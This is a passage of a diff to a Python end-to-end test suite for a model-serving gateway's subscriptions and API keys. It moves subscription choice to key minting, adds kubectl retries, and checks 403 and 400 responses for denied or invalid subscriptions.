+        f"TokenRateLimitPolicy {trlp_name} was not created and enforced in {model_namespace} within {timeout}s"
+    )
+
+
+def _poll_status(api_key, expected, path=None, extra_headers=None, model_name=None, timeout=None, poll_interval=2):
     """Poll inference endpoint until expected HTTP status or timeout."""
     timeout = timeout or max(RECONCILE_WAIT * 3, 60)
     deadline = time.time() + timeout
@@ -523,7 +692,7 @@ def _poll_status(token, expected, path=None, extra_headers=None, subscription=No
     last_err = None
     while time.time() < deadline:
         try:
-            r = _inference(token, path=path, extra_headers=extra_headers, subscription=subscription)
+            r = _inference(api_key, path=path, extra_headers=extra_headers, model_name=model_name)
             last_err = None
             ok = r.status_code == expected if isinstance(expected, int) else r.status_code in expected
             if ok:
@@ -565,6 +734,22 @@ def _snapshot_cr(kind, name, namespace=None):
     return cr
 
 
+def _is_transient_kubectl_error(stderr):
+    """Check if kubectl error is likely transient (network, timeout)."""
+    transient_patterns = [
+        "TLS handshake timeout",
+        "connection refused",
+        "connection reset",
+        "i/o timeout",
+        "dial tcp",
+        "EOF",
+        "temporary failure",
+        "network is unreachable",
+    ]
+    stderr_lower = stderr.lower()
+    return any(pattern.lower() in stderr_lower for pattern in transient_patterns)
+
+
 def _list_crs(kind, namespace=None):
     """List all CRs of a given kind.
 
@@ -586,14 +771,31 @@ def _list_crs(kind, namespace=None):
     }.get(kind, f"{kind}s")
 
     cmd = ["kubectl", "get", plural, "-n", namespace, "-o", "json"]
-    result = subprocess.run(
-        cmd,
-        capture_output=True,
-        text=True,
-        check=False
-    )
 
-    if result.returncode != 0:
+    # Retry transient network errors with exponential backoff
+    max_retries = 3
+    retry_delay = 2  # seconds
+
+    for attempt in range(max_retries):
+        result = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            check=False
+        )
+
+        if result.returncode == 0:
+            return json.loads(result.stdout).get("items", [])
+
+        # Check if error is transient and we have retries left
+        if attempt < max_retries - 1 and _is_transient_kubectl_error(result.stderr):
+            log.warning(
+                f"Transient kubectl error (attempt {attempt + 1}/{max_retries}): {result.stderr.strip()}"
+            )
+            time.sleep(retry_delay * (attempt + 1))  # exponential backoff
+            continue
+
+        # Final attempt or non-transient error
         raise RuntimeError(
             f"Failed to list {plural} in namespace '{namespace}'.\n"
             f"Command: {' '.join(cmd)}\n"
@@ -602,20 +804,9 @@ def _list_crs(kind, namespace=None):
             f"Guidance: Ensure the CRD exists, namespace is correct, and you have permissions."
         )
 
-    return json.loads(result.stdout).get("items", [])
-
-
-def _get_cr_annotations(kind, name, namespace="llm"):
-    """Return annotations dict of a CR, or None if not found."""
-    result = subprocess.run(
-        ["oc", "get", kind, name, "-n", namespace, "-o", "json"],
-        capture_output=True,
-        text=True,
-    )
-    if result.returncode != 0:
-        return None
-    obj = json.loads(result.stdout)
-    return obj.get("metadata", {}).get("annotations") or {}
+    # Unreachable: loop always exits via return (line 684) or raise (line 695)
+    # Included for type checker and defensive programming
+    return []
 
 
 # ---------------------------------------------------------------------------
@@ -667,6 +858,97 @@ def test_wrong_group_gets_403(self):
         assert r.status_code == 403, f"Expected 403, got {r.status_code}"
 
 
+# Higher than typical default subscriptions (e.g. 0) so SelectHighestPriority picks this CR.
+_E2E_API_KEY_BINDING_HIGH_PRIORITY = 100_000
+
+
+@pytest.fixture(scope="class")
+def high_priority_subscription_name_for_api_key_binding():
+    name = f"e2e-apikey-sub-binding-{uuid.uuid4().hex[:8]}"
+    ns = _ns()
+    try:
+        _create_test_subscription(
+            name,
+            MODEL_REF,
+            groups=["system:authenticated"],
+            priority=_E2E_API_KEY_BINDING_HIGH_PRIORITY,
+        )
+        _wait_for_maas_subscription_ready(name, ns, timeout=90)
+        yield name
+    finally:
+        _delete_cr("maassubscription", name)
+
+
+class TestAPIKeySubscriptionBinding:
+    """API key mint: default highest-priority subscription vs explicit subscription vs invalid name."""
+
+    def _api_keys_url(self) -> str:
+        return f"{_maas_api_url()}/v1/api-keys"
+
+    def _auth_headers(self) -> dict:
+        return {
+            "Authorization": f"Bearer {_get_cluster_token()}",
+            "Content-Type": "application/json",
+        }
+
+    def _revoke_key(self, key_id: str) -> None:
+        _revoke_api_key(_get_cluster_token(), key_id)
+
+    def test_create_api_key_uses_highest_priority_subscription(
+        self,
+        high_priority_subscription_name_for_api_key_binding: str,
+    ):
+        """Omitting subscription binds the accessible subscription with highest spec.priority."""
+        r = requests.post(
+            self._api_keys_url(),
+            headers=self._auth_headers(),
+            json={"name": f"test-key-high-prio-{uuid.uuid4().hex[:6]}"},
+            timeout=TIMEOUT,
+            verify=TLS_VERIFY,
+        )
+        assert r.status_code in (200, 201), f"Expected 200/201, got {r.status_code}: {r.text}"
+        data = r.json()
+        assert data.get("subscription") == high_priority_subscription_name_for_api_key_binding, (
+            f"Expected default bind to {high_priority_subscription_name_for_api_key_binding!r}, "
+            f"got {data.get('subscription')!r}"
+        )
+        self._revoke_key(data["id"])
+
+    def test_create_api_key_with_explicit_simulator_subscription(
+        self,
+        high_priority_subscription_name_for_api_key_binding: str,
+    ):
+        """Explicit subscription in body should bind that subscription, not the highest-priority one."""
+        designated = SIMULATOR_SUBSCRIPTION
+        r = requests.post(
+            self._api_keys_url(),
+            headers=self._auth_headers(),
+            json={"name": f"test-key-explicit-sub-{uuid.uuid4().hex[:6]}", "subscription": designated},
+            timeout=TIMEOUT,
+            verify=TLS_VERIFY,
+        )
+        assert r.status_code in (200, 201), f"Expected 200/201, got {r.status_code}: {r.text}"
+        data = r.json()
+        assert data.get("subscription") == designated
+        assert data.get("subscription") != high_priority_subscription_name_for_api_key_binding
+        self._revoke_key(data["id"])
+
+    @pytest.mark.usefixtures("high_priority_subscription_name_for_api_key_binding")
+    def test_create_api_key_nonexistent_subscription_errors(self):
+        """Unknown subscription name should fail with generic invalid_subscription."""
+        bogus = f"e2e-no-such-subscription-{uuid.uuid4().hex}"
+        r = requests.post(
+            self._api_keys_url(),
+            headers=self._auth_headers(),
+            json={"name": f"test-key-bogus-sub-{uuid.uuid4().hex[:6]}", "subscription": bogus},
+            timeout=TIMEOUT,
+            verify=TLS_VERIFY,
+        )
+        assert r.status_code == 400, f"Expected 400, got {r.status_code}: {r.text}"
+        body = r.json()
+        assert body.get("code") == "invalid_subscription", body
+
+
 class TestSubscriptionEnforcement:
     """Tests that MaaSSubscription correctly enforces rate limits using API keys."""
 
@@ -678,9 +960,9 @@ def test_subscribed_user_gets_200(self):
 
     def test_auth_pass_no_subscription_gets_403(self):
         """API key with auth pass but no matching subscription should get 403.
-        
+
         The AuthPolicy includes a subscription-error-check rule that calls
-        /v1/subscriptions/select. If no subscription matches the user's groups,
+        /internal/v1/subscriptions/select. If no subscription matches the user's groups,
         the request is denied with 403 "no matching subscription found for user".
         
         To test this, we temporarily add system:authenticated to the premium model's
@@ -722,19 +1004,6 @@ def test_auth_pass_no_subscription_gets_403(self):
             _delete_cr("maasauthpolicy", "e2e-auth-pass-sub-fail")
             _wait_reconcile()
 
-    def test_invalid_subscription_header_gets_429(self):
-        """API key with invalid subscription header should get 429 or 403."""
-        api_key = _get_default_api_key()
-        r = _inference(api_key, extra_headers={"x-maas-subscription": INVALID_SUBSCRIPTION})
-        # Gateway may return 429 (rate limited) or 403 (forbidden) for invalid subscription
-        assert r.status_code in (429, 403), f"Expected 429 or 403, got {r.status_code}"
-
-    def test_explicit_subscription_header_works(self):
-        """API key with explicit valid subscription header should work."""
-        api_key = _get_default_api_key()
-        r = _inference(api_key, extra_headers={"x-maas-subscription": SIMULATOR_SUBSCRIPTION})
-        assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text[:200]}"
-
     def test_rate_limit_exhaustion_gets_429(self):
         """
         Test that a user gets 429 when they actually exceed their token rate limit.
@@ -779,8 +1048,13 @@ def test_rate_limit_exhaustion_gets_429(self):
             )
             _wait_reconcile()
 
-            # 3. Get API key for testing
-            api_key = _get_default_api_key()
+            # 3. API key must be minted for this subscription
+            oc_token = _get_cluster_token()
+            api_key = _create_api_key(
+                oc_token,
+                name=f"e2e-rate-limit-{uuid.uuid4().hex[:8]}",
+                subscription=subscription_name,
+            )
 
             # 4. Send requests to exhaust the limit
             # Calculate expected successful requests: token_limit / max_tokens = 15 / 3 = 5
@@ -792,7 +1066,7 @@ def test_rate_limit_exhaustion_gets_429(self):
             success_count = 0
 
             for i in range(total_requests):
-                r = _inference(api_key, path=model_path, subscription=subscription_name)
+                r = _inference(api_key, path=model_path)
                 request_num = i + 1
                 log.info(f"Request {request_num}/{total_requests}: {r.status_code}")
 
@@ -876,31 +1150,6 @@ def test_user_in_one_of_two_subscriptions_gets_200(self):
             _wait_reconcile()
 
 
-    def test_multi_tier_auto_select_highest(self):
-        """With 2 tiers for the same model, API key in both should still get access.
-        (Verifies multiple overlapping subscriptions don't break routing.)"""
-        ns = _ns()
-        try:
-            _apply_cr({
-                "apiVersion": "maas.opendatahub.io/v1alpha1",
-                "kind": "MaaSSubscription",
-                "metadata": {"name": "e2e-high-tier", "namespace": ns},
-                "spec": {
-                    "owner": {"groups": [{"name": "system:authenticated"}]},
-                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 9999, "window": "1m"}]}],
-                },
-            })
-
-            api_key = _get_default_api_key()
-            _poll_status(api_key, 200, extra_headers={"x-maas-subscription": "e2e-high-tier"})
-
-            r2 = _inference(api_key)
-            assert r2.status_code == 200, f"Expected 200 with auto-select, got {r2.status_code}"
-        finally:
-            _delete_cr("maassubscription", "e2e-high-tier")
-            _wait_reconcile()
-
-
 class TestMultipleAuthPoliciesPerModel:
     """Multiple auth policies for one model aggregate with OR logic."""
 
@@ -930,9 +1179,13 @@ def test_two_auth_policies_or_logic(self):
             })
             _wait_reconcile()
             
-            # Default API key (inherits user's system:authenticated group) should now work
-            api_key = _get_default_api_key()
-            r = _poll_status(api_key, 200, path=PREMIUM_MODEL_PATH, subscription="e2e-premium-sa-sub")
+            # Key must be minted for the premium subscription
+            api_key = _create_api_key(
+                _get_cluster_token(),
+                name=f"e2e-premium-sa-{uuid.uuid4().hex[:8]}",
+                subscription="e2e-premium-sa-sub",
+            )
+            r = _poll_status(api_key, 200, path=PREMIUM_MODEL_PATH, timeout=30)
             log.info(f"API key with 2nd auth policy -> premium: {r.status_code}")
         finally:
             _delete_cr("maassubscription", "e2e-premium-sa-sub")
@@ -994,22 +1247,19 @@ def test_delete_subscription_rebuilds_trlp(self):
             _delete_cr("maassubscription", "e2e-temp-sub")
 
     def test_delete_last_subscription_denies_access(self):
-        """Delete all subscriptions for a model -> access denied (403 or 429).
-        
-        When the last subscription is deleted, access is denied. The exact code
-        depends on which policy evaluates first:
-        - 403: AuthPolicy's subscription-error-check denies (no subscription found)
-        - 429: Default-deny TRLP with 0 tokens kicks in
-        
-        Both indicate the intended behavior: no subscription = no access.
+        """Delete all subscriptions for a model -> access denied with 403 Forbidden.
+
+        When the last subscription is deleted, AuthPolicy's subscription validation
+        fails (no subscriptions found for user) and returns 403 Forbidden before
+        the request reaches TokenRateLimitPolicy.
         """
         api_key = _get_default_api_key()
         original = _snapshot_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
         assert original, f"Pre-existing {SIMULATOR_SUBSCRIPTION} not found"
         try:
             _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
-            # With no subscription, expect either 403 or 429 (both = access denied)
-            r = _poll_status(api_key, [403, 429], subscription=False, timeout=30)
+            # With no subscription, expect 403 from AuthPolicy subscription validation
+            r = _poll_status(api_key, 403, timeout=30)
             log.info(f"No subscriptions -> {r.status_code} (access denied as expected)")
         finally:
             _apply_cr(original)
@@ -1031,10 +1281,7 @@ def test_subscription_before_auth_policy(self):
         """Create subscription first, then auth policy -> should work once both exist."""
         ns = _ns()
         try:
-            # Get the default API key (inherits user's groups including system:authenticated)
-            api_key = _get_default_api_key()
-
-            # Create subscription first (for system:authenticated group)
+            # Subscription CR must exist before minting a key bound to it
             _apply_cr({
                 "apiVersion": "maas.opendatahub.io/v1alpha1",
                 "kind": "MaaSSubscription",
@@ -1045,9 +1292,16 @@ def test_subscription_before_auth_policy(self):
                 },
             })
             _wait_reconcile()
+            _wait_for_maas_subscription_ready("e2e-ordering-sub", namespace=ns, timeout=90)
+
+            api_key = _create_api_key(
+                _get_cluster_token(),
+                name=f"e2e-ordering-{uuid.uuid4().hex[:8]}",
+                subscription="e2e-ordering-sub",
+            )
 
             # Without auth policy for system:authenticated on premium model, request should fail with 403
-            r1 = _inference(api_key, path=PREMIUM_MODEL_PATH, subscription="e2e-ordering-sub")
+            r1 = _inference(api_key, path=PREMIUM_MODEL_PATH)
             log.info(f"Sub only (no auth policy) -> {r1.status_code}")
             assert r1.status_code == 403, f"Expected 403 (no auth policy yet), got {r1.status_code}"
 
@@ -1063,7 +1317,7 @@ def test_subscription_before_auth_policy(self):
             })
 
             # Now it should work
-            r2 = _poll_status(api_key, 200, path=PREMIUM_MODEL_PATH, subscription="e2e-ordering-sub")
+            r2 = _poll_status(api_key, 200, path=PREMIUM_MODEL_PATH)
             log.info(f"Sub + auth policy -> {r2.status_code}")
         finally:
             _delete_cr("maassubscription", "e2e-ordering-sub")
@@ -1078,7 +1332,7 @@ def test_authpolicy_managed_false_prevents_update(self):
         """AuthPolicy annotated with opendatahub.io/managed=false must not have
         its spec updated when the parent MaaSAuthPolicy is modified."""
         ns = _ns()
-        ap_ns = "llm"
+        ap_ns = MODEL_NAMESPACE
         parent_snapshot = None
         try:
             # 1. Verify the AuthPolicy exists
@@ -1172,7 +1426,7 @@ def test_trlp_managed_false_prevents_update(self):
         """TokenRateLimitPolicy annotated with opendatahub.io/managed=false must not
         have its spec updated when the parent MaaSSubscription is modified."""
         ns = _ns()
-        trlp_ns = "llm"
+        trlp_ns = MODEL_NAMESPACE
         parent_snapshot = None
         try:
             # 1. Verify the TRLP exists
@@ -1273,128 +1527,19 @@ def test_trlp_managed_false_prevents_update(self):
             _wait_reconcile()
 
 
-class TestMaasSubscriptionNamespace:
-    """Verifies MaaS controller reconciles CRs from any namespace (namespace scoping support)."""
-
-    def test_authpolicy_and_subscription_in_maas_subscription_namespace(self):
-        """MaaSAuthPolicy and MaaSSubscription in MaaS subscription namespace should be reconciled
-        and should appear in the AuthPolicy and TRLP annotations for the model."""
-        ns = _ns()
-        try:
-            _apply_cr({
-                "apiVersion": "maas.opendatahub.io/v1alpha1",
-                "kind": "MaaSAuthPolicy",
-                "metadata": {"name": "e2e-watched-auth", "namespace": ns},
-                "spec": {
-                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
-                    "subjects": {"groups": [{"name": "system:authenticated"}]},
-                },
-            })
-            _apply_cr({
-                "apiVersion": "maas.opendatahub.io/v1alpha1",
-                "kind": "MaaSSubscription",
-                "metadata": {"name": "e2e-watched-sub", "namespace": ns},
-                "spec": {
-                    "owner": {"groups": [{"name": "system:authenticated"}]},
-                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}],
-                },
-            })
-            _wait_reconcile(30)
-
-            auth_name = f"maas-auth-{MODEL_REF}"
-            auth_annotations = _get_cr_annotations("authpolicy", auth_name, "llm")
-            assert auth_annotations is not None, (
-                f"AuthPolicy {auth_name} not found"
-            )
-            assert "e2e-watched-auth" in auth_annotations.get("maas.opendatahub.io/auth-policies", "").split(","), (
-                "MaaSAuthPolicy e2e-watched-auth not reconciled"
-            )
-
-            trlp_name = f"maas-trlp-{MODEL_REF}"
-            trlp_annotations = _get_cr_annotations("tokenratelimitpolicy", trlp_name, "llm")
-            assert trlp_annotations is not None, (
-                f"TRLP {trlp_name} not found"
-            )
-            assert "e2e-watched-sub" in trlp_annotations.get("maas.opendatahub.io/subscriptions", "").split(","), (
-                "MaaSSubscription e2e-watched-sub not reconciled"
-            )
-        finally:
-            _delete_cr("maasauthpolicy", "e2e-watched-auth")
-            _delete_cr("maassubscription", "e2e-watched-sub")
-            _wait_reconcile()
-
-    def test_authpolicy_and_subscription_in_another_namespace(self):
-        """MaaSAuthPolicy and MaaSSubscription in another namespace should not be reconciled
-        and should not appear in the AuthPolicy and TRLP annotations for the model."""
-        ns = "e2e-unwatched-ns"
-        subprocess.run(
-            ["oc", "create", "namespace", ns],
-            capture_output=True,
-            text=True,
-            check=False,
-        )
-        try:
-            _apply_cr({
-                "apiVersion": "maas.opendatahub.io/v1alpha1",
-                "kind": "MaaSAuthPolicy",
-                "metadata": {"name": "e2e-unwatched-auth", "namespace": ns},
-                "spec": {
-                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
-                    "subjects": {"groups": [{"name": "system:authenticated"}]},
-                },
-            })
-            _apply_cr({
-                "apiVersion": "maas.opendatahub.io/v1alpha1",
-                "kind": "MaaSSubscription",
-                "metadata": {"name": "e2e-unwatched-sub", "namespace": ns},
-                "spec": {
-                    "owner": {"groups": [{"name": "system:authenticated"}]},
-                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}],
-                },
-            })
-            _wait_reconcile(30)
-
-            auth_name = f"maas-auth-{MODEL_REF}"
-            auth_annotations = _get_cr_annotations("authpolicy", auth_name, "llm")
-            assert auth_annotations is not None, (
-                f"AuthPolicy {auth_name} not found"
-            )
-            assert "e2e-unwatched-auth" not in auth_annotations.get("maas.opendatahub.io/auth-policies", "").split(","), (
-                "MaaSAuthPolicy e2e-unwatched-auth not reconciled (namespace scoping should not allow this)"
-            )
-
-            trlp_name = f"maas-trlp-{MODEL_REF}"
-            trlp_annotations = _get_cr_annotations("tokenratelimitpolicy", trlp_name, "llm")
-            assert trlp_annotations is not None, (
-                f"TRLP {trlp_name} not found"
-            )
-            assert "e2e-unwatched-sub" not in trlp_annotations.get("maas.opendatahub.io/subscriptions", "").split(","), (
-                "MaaSSubscription e2e-unwatched-sub not reconciled (namespace scoping should not allow this)"
-            )
-        finally:
-            _delete_cr("maasauthpolicy", "e2e-unwatched-auth", namespace=ns)
-            _delete_cr("maassubscription", "e2e-unwatched-sub", namespace=ns)
-            _wait_reconcile()
-            subprocess.run(
-                ["oc", "delete", "namespace", ns, "--ignore-not-found", "--timeout=30s"],
-                capture_output=True,
-                text=True,
-            )
-
-
 class TestE2ESubscriptionFlow:
     """
     End-to-end tests that create MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription
     from scratch and validate the complete subscription flow.
 
-    Each test creates all necessary CRs and validates one scenario:
-    1. Token with both access (MaaSAuthPolicy) and subscription → 200 OK
-    2. Token with access but no subscription → 403 Forbidden
-    3. Token with subscription but not in MaaSAuthPolicy → 403 Forbidden
-    4. Token with single subscription + no header → auto-select (200 OK)
-    5. Token with multiple subscriptions + no header → 403 Forbidden
-    6. Token with multiple subscriptions + valid header → 200 OK
-    7. Token with multiple subscriptions + invalid header → 403 Forbidden
+    Each test creates all necessary CRs and validates one scenario (gateway inference uses
+    API keys only; subscription is chosen at mint via POST /v1/api-keys):
+    1. API key with both access and bound subscription → 200 OK
+    2. API key bound to subscription that is then removed → 403 Forbidden (auth still passes)
+    3. API key with subscription but no auth → 403 Forbidden
+    4. Single subscription for user + mint without explicit subscription → 200 OK
+    5. Two subscriptions: separate keys minted for each → 200 OK for each
+    6. Mint API key for another user's subscription → 400 invalid_subscription
     """
 
 
@@ -1484,12 +1629,14 @@ def test_e2e_with_both_access_and_subscription_gets_200(self):
 
             _wait_reconcile()
 
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
+            # API key bound to this subscription at mint (inference does not send x-maas-subscription)
+            api_key = _create_api_key(
+                oc_token, name=f"{sa_name}-key", subscription=subscription_name
+            )
 
             # Test: Both access and subscription → 200
             log.info("Testing: API key with both access and subscription")
-            r = _poll_status(api_key, 200, path=model_path, subscription=subscription_name, timeout=90)
+            r = _poll_status(api_key, 200, path=model_path, timeout=90)
             log.info("✅ Both access and subscription → %s", r.status_code)
 
         finally:
@@ -1522,19 +1669,19 @@ def test_e2e_with_access_but_no_subscription_gets_403(self):
             # Create auth policy for this specific user
             _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user])
 
-            # Delete simulator-subscription so user has no matching subscriptions
-            # (otherwise SA matches via system:authenticated group)
-            _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
+            # Bind simulator subscription on the key while the CR still exists, then remove it
+            api_key = _create_api_key(
+                oc_token,
+                name=f"{sa_name}-key",
+                subscription=SIMULATOR_SUBSCRIPTION,
+            )
 
+            _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
             _wait_reconcile()
 
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
-
-            # Test: Auth passes but no subscription → 403 (not in any subscription)
-            log.info("Testing: API key with access but no subscription")
-            r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=False, timeout=90)
-            log.info("✅ Access but no subscription → %s", r.status_code)
+            log.info("Testing: API key after subscription removed (auth still passes)")
+            r = _poll_status(api_key, 403, path=MODEL_PATH, timeout=90)
+            log.info("✅ Access but no live subscription for bound key → %s", r.status_code)
 
         finally:
             # Restore simulator-subscription first
@@ -1580,12 +1727,15 @@ def test_e2e_with_subscription_but_no_access_gets_403(self):
 
             _wait_reconcile()
 
-            # Create API key for the user with subscription but no auth
-            api_key_with_sub = _create_api_key(oc_token_with_sub, name=f"{sa_with_sub}-key")
+            api_key_with_sub = _create_api_key(
+                oc_token_with_sub,
+                name=f"{sa_with_sub}-key",
+                subscription=subscription_name,
+            )
 
             # Test: Subscription but no access → 403
             log.info("Testing: API key with subscription but no access")
-            r = _poll_status(api_key_with_sub, 403, path=MODEL_PATH, subscription=subscription_name, timeout=90)
+            r = _poll_status(api_key_with_sub, 403, path=MODEL_PATH, timeout=90)
             log.info("✅ Subscription but no access → %s", r.status_code)
 
         finally:
@@ -1627,12 +1777,11 @@ def test_e2e_single_subscription_auto_selects(self):
             _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user])
             _wait_reconcile()
 
-            # Create API key for inference
+            # Exactly one subscription for this user → mint can auto-bind it without explicit name
             api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
 
-            # Test: Single subscription + no header → auto-select → 200
-            log.info("Testing: Single subscription auto-select")
-            r = _poll_status(api_key, 200, path=MODEL_PATH, subscription=False, timeout=90)
+            log.info("Testing: Single subscription auto-select at mint")
+            r = _poll_status(api_key, 200, path=MODEL_PATH, timeout=90)
             log.info("✅ Single subscription auto-select → %s", r.status_code)
 
         finally:
@@ -1644,62 +1793,12 @@ def test_e2e_single_subscription_auto_selects(self):
             _delete_sa(sa_name, namespace=ns)
             _wait_reconcile()
 
-    def test_e2e_multiple_subscriptions_without_header_gets_403(self):
-        """
-        E2E test: User with multiple subscriptions must provide header.
-
-        Validates PR #427/#441 behavior: When a user has access to multiple subscriptions
-        but doesn't provide x-maas-subscription header, they receive 403 Forbidden with
-        error code "multiple_subscriptions".
-        """
-        ns = _ns()
-        # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-multi-sub"
-        # Using MODEL_PATH # model_path = f"/llm/{model_ref}"
-        auth_policy_name = "e2e-test-auth-multi-sub"
-        subscription_1 = "e2e-test-subscription-tier1"
-        subscription_2 = "e2e-test-subscription-tier2"
-        sa_name = "e2e-sa-multi-sub"
-
-        try:
-            # Create service account and get OC token for maas-api
-            oc_token = _create_sa_token(sa_name, namespace=ns)
-            sa_user = _sa_to_user(sa_name, namespace=ns)
-
-            # Create test resources with 2 subscriptions for the same user
-            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user])
-            _create_test_subscription(subscription_1, MODEL_REF, users=[sa_user], token_limit=100)
-            _create_test_subscription(subscription_2, MODEL_REF, users=[sa_user], token_limit=500)
-
-            _wait_reconcile()
-
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
-
-            # Test: Multiple subscriptions + no header → 403
-            log.info("Testing: User with multiple subscriptions, no header")
-            r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=False, timeout=90)
-            log.info("✅ Multiple subscriptions without header → %s", r.status_code)
-
-            # Optionally verify error code in response or headers
-            # PR #441 returns error code in x-ext-auth-reason header or response body
-
-        finally:
-            _delete_cr("maassubscription", subscription_1, namespace=ns)
-            _delete_cr("maassubscription", subscription_2, namespace=ns)
-            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
-            _delete_sa(sa_name, namespace=ns)
-            _wait_reconcile()
-
-    def test_e2e_multiple_subscriptions_with_valid_header_gets_200(self):
+    def test_e2e_multiple_subscriptions_separate_keys_gets_200(self):
         """
-        E2E test: User with multiple subscriptions can select one via header.
-
-        Validates PR #427/#441 behavior: When a user has access to multiple subscriptions
-        and provides a valid x-maas-subscription header, they can successfully make requests.
+        User with two subscriptions for the same model: mint one API key per subscription;
+        each key succeeds on inference without x-maas-subscription.
         """
         ns = _ns()
-        # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-multi-sub-valid"
-        # Using MODEL_PATH # model_path = f"/llm/{model_ref}"
         auth_policy_name = "e2e-test-auth-multi-sub-valid"
         subscription_1 = "e2e-test-subscription-free"
         subscription_2 = "e2e-test-subscription-premium"
@@ -1717,19 +1816,24 @@ def test_e2e_multiple_subscriptions_with_valid_header_gets_200(self):
 
             _wait_reconcile()
 
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
+            key1 = _create_api_key(
+                oc_token,
+                name=f"{sa_name}-key-tier1",
+                subscription=subscription_1,
+            )
+            key2 = _create_api_key(
+                oc_token,
+                name=f"{sa_name}-key-tier2",
+                subscription=subscription_2,
+            )
 
-            # Test 1: Select subscription_1 via header → 200
-            log.info("Testing: User with multiple subscriptions, selecting subscription 1")
-            r1 = _poll_status(api_key, 200, path=MODEL_PATH, subscription=subscription_1, timeout=90)
-            log.info("✅ Multiple subscriptions with valid header (tier 1) → %s", r1.status_code)
+            log.info("Testing: key bound to subscription 1")
+            r1 = _poll_status(key1, 200, path=MODEL_PATH, timeout=90)
+            log.info("✅ Key for tier 1 → %s", r1.status_code)
 
-            # Test 2: Select subscription_2 via header → 200
-            log.info("Testing: User with multiple subscriptions, selecting subscription 2")
-            r2 = _inference(api_key, path=MODEL_PATH, subscription=subscription_2)
-            assert r2.status_code == 200, f"Expected 200 for valid subscription_2, got {r2.status_code}"
-            log.info("✅ Multiple subscriptions with valid header (tier 2) → %s", r2.status_code)
+            log.info("Testing: key bound to subscription 2")
+            r2 = _poll_status(key2, 200, path=MODEL_PATH, timeout=90)
+            log.info("✅ Key for tier 2 → %s", r2.status_code)
 
         finally:
             _delete_cr("maassubscription", subscription_1, namespace=ns)
@@ -1738,57 +1842,9 @@ def test_e2e_multiple_subscriptions_with_valid_header_gets_200(self):
             _delete_sa(sa_name, namespace=ns)
             _wait_reconcile()
 
-    def test_e2e_multiple_subscriptions_with_invalid_header_gets_403(self):
-        """
-        E2E test: User with multiple subscriptions + invalid header gets 403.
-
-        Validates PR #441 behavior: When a user provides an invalid or non-existent
-        x-maas-subscription header, they receive 403 Forbidden with error code "not_found".
-        """
-        ns = _ns()
-        # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-multi-sub-invalid"
-        # Using MODEL_PATH # model_path = f"/llm/{model_ref}"
-        auth_policy_name = "e2e-test-auth-multi-sub-invalid"
-        subscription_1 = "e2e-test-subscription-valid"
-        sa_name = "e2e-sa-multi-sub-invalid"
-
-        try:
-            # Create service account and get OC token for maas-api
-            oc_token = _create_sa_token(sa_name, namespace=ns)
-            sa_user = _sa_to_user(sa_name, namespace=ns)
-
-            # Create test resources
-            _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user])
-            _create_test_subscription(subscription_1, MODEL_REF, users=[sa_user])
-
-            _wait_reconcile()
-
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
-
-            # Test: Invalid/non-existent subscription header → 403
-            log.info("Testing: User with invalid subscription header")
-            r = _inference(api_key, path=MODEL_PATH, subscription="nonexistent-subscription-xyz")
-            assert r.status_code == 403, f"Expected 403 for invalid subscription, got {r.status_code}"
-            log.info("✅ Invalid subscription header → %s", r.status_code)
-
-        finally:
-            _delete_cr("maassubscription", subscription_1, namespace=ns)
-            _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
-            _delete_sa(sa_name, namespace=ns)
-            _wait_reconcile()
-
-    def test_e2e_multiple_subscriptions_with_inaccessible_header_gets_403(self):
-        """
-        E2E test: User requesting subscription they don't own gets 403.
-
-        Validates PR #441 behavior: When a user provides an x-maas-subscription header
-        for a subscription they don't have access to, they receive 403 Forbidden with
-        error code "access_denied".
-        """
+    def test_e2e_mint_api_key_denied_for_inaccessible_subscription(self):
+        """POST /v1/api-keys with another user's subscription returns generic invalid_subscription."""
         ns = _ns()
-        # Using existing model (MODEL_REF) # model_ref = "e2e-test-model-access-denied"
-        # Using MODEL_PATH # model_path = f"/llm/{model_ref}"
         auth_policy_name = "e2e-test-auth-access-denied"
         user_subscription = "e2e-test-user-subscription"
         other_subscription = "e2e-test-other-subscription"
@@ -1812,14 +1868,19 @@ def test_e2e_multiple_subscriptions_with_inaccessible_header_gets_403(self):
 
             _wait_reconcile()
 
-            # Create API key for user
-            api_key_user = _create_api_key(oc_token_user, name=f"{sa_user}-key")
-
-            # Test: User tries to access another user's subscription → 403
-            log.info("Testing: User requesting subscription they don't own")
-            r = _inference(api_key_user, path=MODEL_PATH, subscription=other_subscription)
-            assert r.status_code == 403, f"Expected 403 for inaccessible subscription, got {r.status_code}"
-            log.info("✅ Inaccessible subscription header → %s", r.status_code)
+            r = requests.post(
